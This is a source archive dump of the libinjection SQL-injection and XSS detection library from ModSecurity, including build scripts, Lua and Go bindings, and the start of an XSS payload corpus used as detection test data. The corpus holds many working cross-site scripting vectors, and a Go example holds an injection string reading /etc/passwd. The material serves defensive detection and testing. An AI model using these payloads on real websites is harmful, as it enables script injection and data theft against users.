  • All query string values are analyzed. Query string parameter names are not. This isn't a WAF but a diagnostic tool for libinjection.
  • Input is URL-decoded twice, to help prevent cut-n-paste issues.
  • No attempt at processing hex or base64 encoded input is done.
{% end %} modsecurity-v3.0.4/others/libinjection/misc/base.html0000644000175000017500000001115513607066311023223 0ustar zimmerlezimmerle {% block title %}CLIENT9{% end %}
{% block body %} {% end %}
modsecurity-v3.0.4/others/libinjection/misc/Makefile0000644000175000017500000000022313607066311023055 0ustar zimmerlezimmerle all:site PAGES = \ home.html %.html: %.md base.html echo $< ./mdgen.sh $< > $@ clean: rm -f ${PAGES} site: Makefile ${PAGES} .PHONY: site modsecurity-v3.0.4/others/libinjection/make-ci.sh0000755000175000017500000000324113607066311022332 0ustar zimmerlezimmerle#!/bin/sh # this is the script that runs in CI set -e DASH=---------------------- echo $DASH gcc --version echo $DASH make clean make -e check make clean # # Code coverage # export CC=gcc export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra" echo $DASH echo "Generating code coverage" echo "CFLAGS=$CFLAGS" echo make -e check if [ -n "$COVERALLS_REPO_TOKEN" ] ; then echo "uploading to coveralls" coveralls \ --gcov-options '\-lp' \ --exclude-pattern '.*h' \ --exclude src/reader.c \ --exclude src/example1.c \ --exclude src/fptool.c \ --exclude src/test_speed_sqli.c \ --exclude src/test_speed_xss.c \ --exclude src/testdriver.c \ --exclude src/html5_cli.c \ --exclude src/sqli_cli.c \ --exclude python fi echo unset CC unset CFLAGS echo echo $DASH clang --version echo $DASH ./configure-clang.sh echo echo $DASH echo "CLANG STATIC ANALYZER" echo cd src make analyze echo echo $DASH cppcheck --version echo cppcheck --std=c89 \ --enable=all \ --inconclusive \ --suppress=variableScope \ --suppress=missingIncludeSystem \ --quiet \ --error-exitcode=1 \ --template='{file}:{line} {id} {severity} {message}' \ . echo "passed" echo $DASH export CFLAGS="-Wall -Wextra -Werror -pedantic -ansi -g -O1" export VALGRIND="valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/build/src/alpine.supp" echo "GCC + VALGRIND" echo $VALGRIND echo make clean make -e check unset VALGRIND unset CFLAGS echo echo echo "Done!" modsecurity-v3.0.4/others/libinjection/lua/0000755000175000017500000000000013607066311021246 5ustar zimmerlezimmerlemodsecurity-v3.0.4/others/libinjection/lua/testdriver.lua0000644000175000017500000000465013607066311024151 0ustar zimmerlezimmerlerequire 'libinjection' require 'Test.More' require 'Test.Builder.Tester' function trim(s) return s:find'^%s*$' and '' or s:match'^%s*(.*%S)' end function print_token_string(tok) local out = '' if tok.str_open ~= '\0' then out = out .. tok.str_open end out = out .. tok.val if tok.str_close ~= '\0' then out = out .. tok.str_close end return trim(out) end function print_token(tok) local out = '' out = out .. tok.type out = out .. ' ' if tok.type == 's' then out = out .. print_token_string(tok) elseif tok.type == 'v' then if tok.count == 1 then out = out .. '@' elseif tok.count == 2 then out = out .. '@@' end out = out .. print_token_string(tok) else out = out .. tok.val end return '\n' .. trim(out) end function test_tokens(input) local out = '' local sql_state = libinjection.sqli_state() libinjection.sqli_init(sql_state, input, input:len(), libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI) while (libinjection.sqli_tokenize(sql_state) == 1) do out = out .. print_token(sql_state.current) end return out end function test_tokens_mysql(input) local out = '' local sql_state = libinjection.sqli_state() libinjection.sqli_init(sql_state, input, input:len(), libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_MYSQL) while (libinjection.sqli_tokenize(sql_state) == 1) do out = out .. print_token(sql_state.current) end return out end function test_folding(input) local out = '' local sql_state = libinjection.sqli_state() libinjection.sqli_init(sql_state, input, input:len(), 0) libinjection.sqli_fingerprint(sql_state, libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI) for i = 1, sql_state.fingerprint:len() do -- c array is still 0 based out = out .. print_token(libinjection.sqli_get_token(sql_state, i-1)) end -- hack for when there is no output if out == '' then out = '\n' end return out end function test_fingerprints(input) local out = '' local sql_state = libinjection.sqli_state() libinjection.sqli_init(sql_state, input, input:len(), 0) local issqli = libinjection.is_sqli(sql_state) if issqli == 1 then out = sql_state.fingerprint end return out end modsecurity-v3.0.4/others/libinjection/lua/make_test.py0000755000175000017500000000344513607066311023605 0ustar zimmerlezimmerle#!/usr/bin/env python import glob import sys def readtestdata(filename): """ Read a test file and split into components """ state = None info = { '--TEST--': '', '--INPUT--': '', '--EXPECTED--': '' } for line in open(filename, 'r'): line = line.rstrip() if line in ('--TEST--', '--INPUT--', '--EXPECTED--'): state = line elif state: info[state] += line + '\n' # remove last newline from input info['--INPUT--'] = info['--INPUT--'][0:-1] return (info['--TEST--'], info['--INPUT--'].strip(), info['--EXPECTED--'].strip()) def luaescape(s): return s.strip().replace("\\", "\\\\").replace("\n", "\\n").replace("'", "\\'") def genluatest(fname, data): # TBD: change to python os.path name = fname.split('/')[-1] if name.startswith('test-tokens-'): testname = 'test_tokens' extra = "\\n" elif name.startswith('test-tokens_mysql'): testname = 'test_tokens_mysql' extra = "\\n" elif name.startswith('test-folding-'): testname = 'test_folding' extra = "\\n" elif name.startswith('test-sqli-'): testname = 'test_fingerprints' extra = '' else: #print "IGNORING: " + name return name = name.replace('.txt', '') print "is({0}('{1}'),\n '{2}{3}',\n '{4}')\n".format( testname, luaescape(data[1]), extra, luaescape(data[2]), name ) def test2lua(fname): data = readtestdata(fname) genluatest(fname, data) def main(): print "require 'testdriver'\n" files = glob.glob('../tests/test-*.txt') print "plan({0})\n".format(len(files)) for testfile in sorted(files): test2lua(testfile) if __name__ == '__main__': main() modsecurity-v3.0.4/others/libinjection/lua/luatest.lua0000644000175000017500000000470113607066311023434 0ustar zimmerlezimmerle require 'libinjection' -- dofile('sqlifingerprints.lua') -- silly callback that just calls back into C -- identical to libinjection_is_sqli(sql_state, string_input, nil) -- function check_pattern_c(sqlstate) return(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate)) end -- half lua / half c checker -- use lua based fingerprint lookup and still uses C code -- to eliminate false positives function check_pattern(sqlstate) fp = sqlstate.pat if sqlifingerprints[fp] == true then -- try to eliminate certain false positives return(libinjection.sqli_not_whitelist(sqlstate)) else -- not sqli return 0 end end function lookup_word(sqlstate, ltype, word) if ltype == 'X' then return words['0' .. word:upper()] else return words[word:upper()] end end dofile('words.lua') -- THIS USES BUILT IN FINGERPRINTS -- (with last arg of 'nil') sqli = '1 union select * from table' sql_state = libinjection.sqli_state() libinjection.sqli_init(sql_state, sqli, sqli:len(), 0) print(libinjection.is_sqli(sql_state)) print(sql_state.pat) print('----') inputs = { "123 LIKE -1234.5678E+2;", "APPLE 1 9.123 'FOO' \"BAR\"", "/* BAR */ UNION ALL SELECT (2,3,4)", "1 || COS(+0X04) --FOOBAR", "dog apple @cat banana bar", "dog apple cat \"banana \'bar", "102 TABLE CLOTH" } function benchmark(imax) local x,s local t0 = os.clock() local sql_state = libinjection.sqli_state() for x = 0, imax do s = inputs[(x % 7) + 1] libinjection.sqli_init(sql_state, s, s:len(), 0) libinjection.is_sqli(sql_state) end local t1 = os.clock() print( imax / (t1-t0) ) end function benchmark_callback(imax) local x,s local t0 = os.clock() local sql_state = libinjection.sqli_state() for x = 0, imax do s = inputs[(x % 7) + 1] libinjection.sqli_init(sql_state, s, s:len(), 0) libinjection.sqli_callback(sql_state, 'lookup_word'); libinjection.is_sqli(sql_state) end local t1 = os.clock() print( imax / (t1-t0) ) end benchmark(1000000) benchmark_callback(1000000) -- THIS USES LUA FINGERPRINTS via 'check_pattern' function above if 0 then for x = 1,2 do ok = libinjection.is_sqli(sql_state) if ok == 1 then print(sql_state.pat) vec = sql_state.tokenvec for i = 1, sql_state.pat:len() do print(vec[i].type, vec[i].val) end end end end modsecurity-v3.0.4/others/libinjection/lua/libinjection.i0000644000175000017500000000302713607066311024073 0ustar zimmerlezimmerle/* libinjection.i SWIG interface file */ %module libinjection %{ #include "libinjection.h" #include "libinjection_sqli.h" static char libinjection_lua_lookup_word(sfilter* sf, int lookup_type, const char* s, size_t len) { lua_State* L = (lua_State*) sf->userdata; //char* luafunc = (char *)lua_tostring(L, 2); lua_getglobal(L, "lookup_word"); SWIG_NewPointerObj(L, (void*)sf, SWIGTYPE_p_libinjection_sqli_state, 0); lua_pushnumber(L, lookup_type); lua_pushlstring(L, s, len); if (lua_pcall(L, 3, 1, 0)) { printf("Something bad happened"); } const char* result = lua_tostring(L, -1); if (result == NULL) { return 0; } else { return result[0]; } } %} %include "typemaps.i" // The C functions all start with 'libinjection_' as a namespace // We don't need this since it's in the libinjection table // i.e. libinjection.libinjection_is_sqli --> libinjection.is_sqli // %rename("%(strip:[libinjection_])s") ""; %typemap(in) (ptr_lookup_fn fn, void* userdata) { if (lua_isnil(L, 1)) { arg2 = NULL; arg3 = NULL; } else { arg2 = libinjection_lua_lookup_word; arg3 = (void *) L; } } %typemap(out) stoken_t [ANY] { int i; lua_newtable(L); for (i = 0; i < $1_dim0; i++) { lua_pushnumber(L, i+1); SWIG_NewPointerObj(L, (void*)(& $1[i]), SWIGTYPE_p_stoken_t,0); lua_settable(L, -3); } SWIG_arg += 1; } %include "libinjection.h" %include "libinjection_sqli.h" modsecurity-v3.0.4/others/libinjection/lua/generate_lua_fingerprints.py0000755000175000017500000000117213607066311027051 0ustar zimmerlezimmerle#!/usr/bin/env python """ Generates a Lua table of fingerprints. One can then add, turn off or delete fingerprints from lua. """ def make_lua_table(obj): """ Generates table. Fingerprints don't contain any special chars so they don't need to be escaped. The output may be sorted but it is not required. """ fp = obj[u'fingerprints'] print("sqlifingerprints = {") for f in fp: print(' ["{0}"]=true,'.format(f)) print("}") return 0 if __name__ == '__main__': import sys import json with open('../c/sqlparse_data.json', 'r') as fd: make_lua_table(json.load(fd)) modsecurity-v3.0.4/others/libinjection/lua/data2lua.py0000755000175000017500000000162113607066311023320 0ustar zimmerlezimmerle#!/usr/bin/env python # # Copyright 2012, 2013 Nick Galbreath # nickg@client9.com # BSD License -- see COPYING.txt for details # """ Converts a libinjection JSON data file to a C header (.h) file """ def toc(obj): """ main routine """ if False: print 'fingerprints = {' for fp in sorted(obj[u'fingerprints']): print "['{0}']='X',".format(fp) print '}' words = {} keywords = obj['keywords'] for k,v in keywords.iteritems(): words[str(k)] = str(v) for fp in list(obj[u'fingerprints']): fp = '0' + fp.upper() words[str(fp)] = 'F'; print 'words = {' for k in sorted(words.keys()): #print "['{0}']='{1}',".format(k, words[k]) print "['{0}']={1},".format(k, ord(words[k])) print '}' return 0 if __name__ == '__main__': import sys import json sys.exit(toc(json.load(sys.stdin))) modsecurity-v3.0.4/others/libinjection/lua/Makefile0000644000175000017500000000354113607066311022711 0ustar zimmerlezimmerle # either works # ubuntu #LUA_FLAGS=-I/usr/include/lua5.1 -llua5.1 #LUA=/usr/bin/lua5.1 # ubuntu luajit 2 LUA_FLAGS=-I/usr/include/luajit-2.0 -lluajit-5.1 LUA=luajit # centos and friends #LUA_FLAGS=-I/usr/include/ -L/usr/lib64 -llua #LUA=lua SHARED=-shared -Wl,-soname,libinjection.so CFLAGS= -O0 -g -Wall -Wextra -Wformat=2 -fPIC -fno-common APPLE=$(shell uname -a | grep -c Darwin) # MAC OS X - brew install luajit ifeq ($(APPLE),1) SHARED=-dynamiclib LUA_FLAGS=-I/usr/local/include/luajit-2.0 -L/usr/local/lib -lluajit-5.1 LUA=luajit endif # need to hack a linux version here # # MAC OS X: note using ".so" suffix NOT ".dylib" libinjection.so: copy libinjection_wrap.c ${CC} ${CFLAGS} -I. ${LUA_FLAGS} \ ${SHARED} libinjection_wrap.c libinjection_sqli.c libinjection_html5.c libinjection_xss.c -o libinjection.so # build and run unit tests # Uses a python helper to read the test files to generate # a TAP test plan. Easier that writing lots of LUA glue code # and super-fast! # test-unit: libinjection.so lua-TestMore ./make_test.py > unit-test.t LUA_PATH='?.lua;lua-TestMore/src/?.lua' ${LUA} unit-test.t test: test-unit libinjection_wrap.c: libinjection.i libinjection.h swig -version swig -lua -Wall -Wextra libinjection.i sqlifingerprints.lua: generate_lua_fingerprints.py ../src/sqlparse_data.json ./generate_lua_fingerprints.py > sqlifingerprints.lua copy: cp ../src/libinjection*.h ../src/libinjection*.c . .PHONY: copy sample: sqlifingerprints.lua ${LUA} luatest.lua # --depth 1 -- get without history lua-TestMore: git clone --depth 1 https://github.com/fperrad/lua-TestMore.git speed: ${LUA} luatest.lua clean: @rm -f *~ @rm -rf *.dSYM *.so *.dylib @rm -f libinjection.h libinjection_sqli.c libinjection_sqli_data.h @rm -f sqlifingerprints.lua @rm -f unit-test.t @rm -f libinjection_sqli.c.* @rm -f junit*.xml @rm -f libinjection_wrap.c modsecurity-v3.0.4/others/libinjection/lua/.gitignore0000644000175000017500000000001513607066311023232 0ustar zimmerlezimmerlelua-TestMore modsecurity-v3.0.4/others/libinjection/install-sh0000755000175000017500000003325513607066311022501 0ustar zimmerlezimmerle#!/bin/sh # install - install a program, script, or datafile scriptversion=2011-11-20.07; # UTC # This originates from X11R5 (mit/util/scripts/install.sh), which was # later released in X11R6 (xc/config/util/install.sh) with the # following copyright and license. # # Copyright (C) 1994 X Consortium # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # X CONSORTIUM BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN # AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNEC- # TION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # # Except as contained in this notice, the name of the X Consortium shall not # be used in advertising or otherwise to promote the sale, use or other deal- # ings in this Software without prior written authorization from the X Consor- # tium. # # # FSF changes to this file are in the public domain. # # Calling this script install-sh is preferred over install.sh, to prevent # 'make' implicit rules from creating a file called install from it # when there is no Makefile. # # This script is compatible with the BSD install script, but was written # from scratch. nl=' ' IFS=" "" $nl" # set DOITPROG to echo to test this script # Don't use :- since 4.3BSD and earlier shells don't like it. doit=${DOITPROG-} if test -z "$doit"; then doit_exec=exec else doit_exec=$doit fi # Put in absolute file names if you don't have them in your path; # or use environment vars. chgrpprog=${CHGRPPROG-chgrp} chmodprog=${CHMODPROG-chmod} chownprog=${CHOWNPROG-chown} cmpprog=${CMPPROG-cmp} cpprog=${CPPROG-cp} mkdirprog=${MKDIRPROG-mkdir} mvprog=${MVPROG-mv} rmprog=${RMPROG-rm} stripprog=${STRIPPROG-strip} posix_glob='?' initialize_posix_glob=' test "$posix_glob" != "?" || { if (set -f) 2>/dev/null; then posix_glob= else posix_glob=: fi } ' posix_mkdir= # Desired mode of installed file. mode=0755 chgrpcmd= chmodcmd=$chmodprog chowncmd= mvcmd=$mvprog rmcmd="$rmprog -f" stripcmd= src= dst= dir_arg= dst_arg= copy_on_change=false no_target_directory= usage="\ Usage: $0 [OPTION]... [-T] SRCFILE DSTFILE or: $0 [OPTION]... SRCFILES... DIRECTORY or: $0 [OPTION]... -t DIRECTORY SRCFILES... or: $0 [OPTION]... -d DIRECTORIES... In the 1st form, copy SRCFILE to DSTFILE. In the 2nd and 3rd, copy all SRCFILES to DIRECTORY. In the 4th, create DIRECTORIES. Options: --help display this help and exit. --version display version info and exit. -c (ignored) -C install only if different (preserve the last data modification time) -d create directories instead of installing files. -g GROUP $chgrpprog installed files to GROUP. -m MODE $chmodprog installed files to MODE. -o USER $chownprog installed files to USER. -s $stripprog installed files. -t DIRECTORY install into DIRECTORY. -T report an error if DSTFILE is a directory. Environment variables override the default commands: CHGRPPROG CHMODPROG CHOWNPROG CMPPROG CPPROG MKDIRPROG MVPROG RMPROG STRIPPROG " while test $# -ne 0; do case $1 in -c) ;; -C) copy_on_change=true;; -d) dir_arg=true;; -g) chgrpcmd="$chgrpprog $2" shift;; --help) echo "$usage"; exit $?;; -m) mode=$2 case $mode in *' '* | *' '* | *' '* | *'*'* | *'?'* | *'['*) echo "$0: invalid mode: $mode" >&2 exit 1;; esac shift;; -o) chowncmd="$chownprog $2" shift;; -s) stripcmd=$stripprog;; -t) dst_arg=$2 # Protect names problematic for 'test' and other utilities. case $dst_arg in -* | [=\(\)!]) dst_arg=./$dst_arg;; esac shift;; -T) no_target_directory=true;; --version) echo "$0 $scriptversion"; exit $?;; --) shift break;; -*) echo "$0: invalid option: $1" >&2 exit 1;; *) break;; esac shift done if test $# -ne 0 && test -z "$dir_arg$dst_arg"; then # When -d is used, all remaining arguments are directories to create. # When -t is used, the destination is already specified. # Otherwise, the last argument is the destination. Remove it from $@. for arg do if test -n "$dst_arg"; then # $@ is not empty: it contains at least $arg. set fnord "$@" "$dst_arg" shift # fnord fi shift # arg dst_arg=$arg # Protect names problematic for 'test' and other utilities. case $dst_arg in -* | [=\(\)!]) dst_arg=./$dst_arg;; esac done fi if test $# -eq 0; then if test -z "$dir_arg"; then echo "$0: no input file specified." >&2 exit 1 fi # It's OK to call 'install-sh -d' without argument. # This can happen when creating conditional directories. exit 0 fi if test -z "$dir_arg"; then do_exit='(exit $ret); exit $ret' trap "ret=129; $do_exit" 1 trap "ret=130; $do_exit" 2 trap "ret=141; $do_exit" 13 trap "ret=143; $do_exit" 15 # Set umask so as not to create temps with too-generous modes. # However, 'strip' requires both read and write access to temps. case $mode in # Optimize common cases. *644) cp_umask=133;; *755) cp_umask=22;; *[0-7]) if test -z "$stripcmd"; then u_plus_rw= else u_plus_rw='% 200' fi cp_umask=`expr '(' 777 - $mode % 1000 ')' $u_plus_rw`;; *) if test -z "$stripcmd"; then u_plus_rw= else u_plus_rw=,u+rw fi cp_umask=$mode$u_plus_rw;; esac fi for src do # Protect names problematic for 'test' and other utilities. case $src in -* | [=\(\)!]) src=./$src;; esac if test -n "$dir_arg"; then dst=$src dstdir=$dst test -d "$dstdir" dstdir_status=$? else # Waiting for this to be detected by the "$cpprog $src $dsttmp" command # might cause directories to be created, which would be especially bad # if $src (and thus $dsttmp) contains '*'. if test ! -f "$src" && test ! -d "$src"; then echo "$0: $src does not exist." >&2 exit 1 fi if test -z "$dst_arg"; then echo "$0: no destination specified." >&2 exit 1 fi dst=$dst_arg # If destination is a directory, append the input filename; won't work # if double slashes aren't ignored. if test -d "$dst"; then if test -n "$no_target_directory"; then echo "$0: $dst_arg: Is a directory" >&2 exit 1 fi dstdir=$dst dst=$dstdir/`basename "$src"` dstdir_status=0 else # Prefer dirname, but fall back on a substitute if dirname fails. dstdir=` (dirname "$dst") 2>/dev/null || expr X"$dst" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$dst" : 'X\(//\)[^/]' \| \ X"$dst" : 'X\(//\)$' \| \ X"$dst" : 'X\(/\)' \| . 2>/dev/null || echo X"$dst" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q' ` test -d "$dstdir" dstdir_status=$? fi fi obsolete_mkdir_used=false if test $dstdir_status != 0; then case $posix_mkdir in '') # Create intermediate dirs using mode 755 as modified by the umask. # This is like FreeBSD 'install' as of 1997-10-28. umask=`umask` case $stripcmd.$umask in # Optimize common cases. *[2367][2367]) mkdir_umask=$umask;; .*0[02][02] | .[02][02] | .[02]) mkdir_umask=22;; *[0-7]) mkdir_umask=`expr $umask + 22 \ - $umask % 100 % 40 + $umask % 20 \ - $umask % 10 % 4 + $umask % 2 `;; *) mkdir_umask=$umask,go-w;; esac # With -d, create the new directory with the user-specified mode. # Otherwise, rely on $mkdir_umask. if test -n "$dir_arg"; then mkdir_mode=-m$mode else mkdir_mode= fi posix_mkdir=false case $umask in *[123567][0-7][0-7]) # POSIX mkdir -p sets u+wx bits regardless of umask, which # is incompatible with FreeBSD 'install' when (umask & 300) != 0. ;; *) tmpdir=${TMPDIR-/tmp}/ins$RANDOM-$$ trap 'ret=$?; rmdir "$tmpdir/d" "$tmpdir" 2>/dev/null; exit $ret' 0 if (umask $mkdir_umask && exec $mkdirprog $mkdir_mode -p -- "$tmpdir/d") >/dev/null 2>&1 then if test -z "$dir_arg" || { # Check for POSIX incompatibilities with -m. # HP-UX 11.23 and IRIX 6.5 mkdir -m -p sets group- or # other-writable bit of parent directory when it shouldn't. # FreeBSD 6.1 mkdir -m -p sets mode of existing directory. ls_ld_tmpdir=`ls -ld "$tmpdir"` case $ls_ld_tmpdir in d????-?r-*) different_mode=700;; d????-?--*) different_mode=755;; *) false;; esac && $mkdirprog -m$different_mode -p -- "$tmpdir" && { ls_ld_tmpdir_1=`ls -ld "$tmpdir"` test "$ls_ld_tmpdir" = "$ls_ld_tmpdir_1" } } then posix_mkdir=: fi rmdir "$tmpdir/d" "$tmpdir" else # Remove any dirs left behind by ancient mkdir implementations. rmdir ./$mkdir_mode ./-p ./-- 2>/dev/null fi trap '' 0;; esac;; esac if $posix_mkdir && ( umask $mkdir_umask && $doit_exec $mkdirprog $mkdir_mode -p -- "$dstdir" ) then : else # The umask is ridiculous, or mkdir does not conform to POSIX, # or it failed possibly due to a race condition. Create the # directory the slow way, step by step, checking for races as we go. case $dstdir in /*) prefix='/';; [-=\(\)!]*) prefix='./';; *) prefix='';; esac eval "$initialize_posix_glob" oIFS=$IFS IFS=/ $posix_glob set -f set fnord $dstdir shift $posix_glob set +f IFS=$oIFS prefixes= for d do test X"$d" = X && continue prefix=$prefix$d if test -d "$prefix"; then prefixes= else if $posix_mkdir; then (umask=$mkdir_umask && $doit_exec $mkdirprog $mkdir_mode -p -- "$dstdir") && break # Don't fail if two instances are running concurrently. test -d "$prefix" || exit 1 else case $prefix in *\'*) qprefix=`echo "$prefix" | sed "s/'/'\\\\\\\\''/g"`;; *) qprefix=$prefix;; esac prefixes="$prefixes '$qprefix'" fi fi prefix=$prefix/ done if test -n "$prefixes"; then # Don't fail if two instances are running concurrently. (umask $mkdir_umask && eval "\$doit_exec \$mkdirprog $prefixes") || test -d "$dstdir" || exit 1 obsolete_mkdir_used=true fi fi fi if test -n "$dir_arg"; then { test -z "$chowncmd" || $doit $chowncmd "$dst"; } && { test -z "$chgrpcmd" || $doit $chgrpcmd "$dst"; } && { test "$obsolete_mkdir_used$chowncmd$chgrpcmd" = false || test -z "$chmodcmd" || $doit $chmodcmd $mode "$dst"; } || exit 1 else # Make a couple of temp file names in the proper directory. dsttmp=$dstdir/_inst.$$_ rmtmp=$dstdir/_rm.$$_ # Trap to clean up those temp files at exit. trap 'ret=$?; rm -f "$dsttmp" "$rmtmp" && exit $ret' 0 # Copy the file name to the temp name. (umask $cp_umask && $doit_exec $cpprog "$src" "$dsttmp") && # and set any options; do chmod last to preserve setuid bits. # # If any of these fail, we abort the whole thing. If we want to # ignore errors from any of these, just make sure not to ignore # errors from the above "$doit $cpprog $src $dsttmp" command. # { test -z "$chowncmd" || $doit $chowncmd "$dsttmp"; } && { test -z "$chgrpcmd" || $doit $chgrpcmd "$dsttmp"; } && { test -z "$stripcmd" || $doit $stripcmd "$dsttmp"; } && { test -z "$chmodcmd" || $doit $chmodcmd $mode "$dsttmp"; } && # If -C, don't bother to copy if it wouldn't change the file. if $copy_on_change && old=`LC_ALL=C ls -dlL "$dst" 2>/dev/null` && new=`LC_ALL=C ls -dlL "$dsttmp" 2>/dev/null` && eval "$initialize_posix_glob" && $posix_glob set -f && set X $old && old=:$2:$4:$5:$6 && set X $new && new=:$2:$4:$5:$6 && $posix_glob set +f && test "$old" = "$new" && $cmpprog "$dst" "$dsttmp" >/dev/null 2>&1 then rm -f "$dsttmp" else # Rename the file to the real destination. $doit $mvcmd -f "$dsttmp" "$dst" 2>/dev/null || # The rename failed, perhaps because mv can't rename something else # to itself, or perhaps because mv is so ancient that it does not # support -f. { # Now remove or move aside any old file at destination location. # We try this two ways since rm can't unlink itself on some # systems and the destination file might be busy for other # reasons. In this case, the final cleanup might fail but the new # file should still install successfully. { test ! -f "$dst" || $doit $rmcmd -f "$dst" 2>/dev/null || { $doit $mvcmd -f "$dst" "$rmtmp" 2>/dev/null && { $doit $rmcmd -f "$rmtmp" 2>/dev/null; :; } } || { echo "$0: cannot unlink or rename $dst" >&2 (exit 1); exit 1 } } && # Now rename the file to the real destination. $doit $mvcmd "$dsttmp" "$dst" } fi || exit 1 trap '' 0 fi done # Local variables: # eval: (add-hook 'write-file-hooks 'time-stamp) # time-stamp-start: "scriptversion=" # time-stamp-format: "%:y-%02m-%02d.%02H" # time-stamp-time-zone: "UTC" # time-stamp-end: "; # UTC" # End: modsecurity-v3.0.4/others/libinjection/go/0000755000175000017500000000000013607066311021072 5ustar zimmerlezimmerlemodsecurity-v3.0.4/others/libinjection/go/main.go0000644000175000017500000000160713607066311022351 0ustar zimmerlezimmerle/* * Copyright (c) 2013 Radolsaw Wesolowski * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * */ package main /* #cgo CFLAGS: -I./libinjection #cgo LDFLAGS: -L./libinjection -linjection #include "libinjection.h" #include "libinjection_sqli.h" */ import "C" import ( "bytes" "fmt" "unsafe" ) func main() { sqlinjection := "asdf asd ; -1' and 1=1 union/* foo */select load_file('/etc/passwd')--" var out [8]C.char pointer := (*C.char)(unsafe.Pointer(&out[0])) if found := C.libinjection_sqli(C.CString(sqlinjection), C.size_t(len(sqlinjection)), pointer); found == 1 { output := C.GoBytes(unsafe.Pointer(&out[0]), 8) fmt.Printf("sqli with fingerprint of '%s'\n", string(output[:bytes.Index(output, []byte{0})])) } } modsecurity-v3.0.4/others/libinjection/go/Makefile0000644000175000017500000000144113607066311022532 0ustar zimmerlezimmerleall: buildgo .PHONY: buildgo buildgo: buildlibinjection go build main.go @echo "Run ./main" .PHONY: copylibinjection copylibinjection: mkdir libinjection cp ../src/libinjection*.h ./libinjection cp ../src/libinjection*.c ./libinjection buildlibinjection: copylibinjection gcc -std=c99 -Wall -Werror -fpic -c libinjection/libinjection_sqli.c -o libinjection/libinjection_sqli.o gcc -std=c99 -Wall -Werror -fpic -c libinjection/libinjection_xss.c -o libinjection/libinjection_xss.o gcc -std=c99 -Wall -Werror -fpic -c libinjection/libinjection_html5.c -o libinjection/libinjection_html5.o gcc -dynamiclib -shared -o libinjection/libinjection.so libinjection/libinjection_sqli.o libinjection/libinjection_xss.o libinjection/libinjection_html5.o clean: @rm -rf libinjection @rm -f main modsecurity-v3.0.4/others/libinjection/data/0000755000175000017500000000000013607066311021376 5ustar zimmerlezimmerlemodsecurity-v3.0.4/others/libinjection/data/xss-xenotix.txt0000644000175000017500000023515613607066311024464 0ustar zimmerlezimmerle# # Original source is from # https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/blob/master/Scanner/xenotix_main.resx # # * XML-decoded # * Duplicates removed # * arious forms of control-characters normalized # * Non-XSS removed # * Obsolete XSS removed (e.g. one for src=livescript lol circa 1995) # %00 � # not doing XSS inside a comment # --> "'`><%00img src=xxx:x onerror=javascript:alert(1)> %00“> '`"><%00script>javascript:alert(1) 0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk')) OnMouseOver {Firefox & Opera} 1 1 1> 1> 1`> 1`> 1 '%20onmouseover=alert(1)' --> %22%20onmouseover=javascript:alert(1)%20%22 %22%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E %22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(1);> %22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E %26'%22%3E%3Cscript%3Ealert(%2Fkcf%2F)%3C%2Fscript%3E%3D %27%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E ">

%00 ">' %3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(1)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E %3Cform%20onmouseover%3Dalert(1)%3E%3Cinput%20name%3Dattributes%3E %3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(1)%3E %3cimg onerror=alert(1) src=a%3e "'`><%3Cimg src=xxx:x onerror=javascript:alert(1)> %3Cscript%3Ea%3D%2FKCF%2F %3Cscript%3Ealert(1)%3B%3C%2Fscript%3E '`"><%3Cscript>javascript:alert(1) %3Cscript>javascript:alert(1) “%3e%3cscript%3ealert(1)%3c/script%3e --> %7D%3C/style%3E43%27%22%3E%3C/title%3E%3Cscript%3Ea=eval;b=alert;a(b(/KCF/.source));%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3EKCF%3C/h1%3E%3C/marquee%3E XYZClickMe KCF "'`>ABC
DEF "'`>ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
DEF ABC
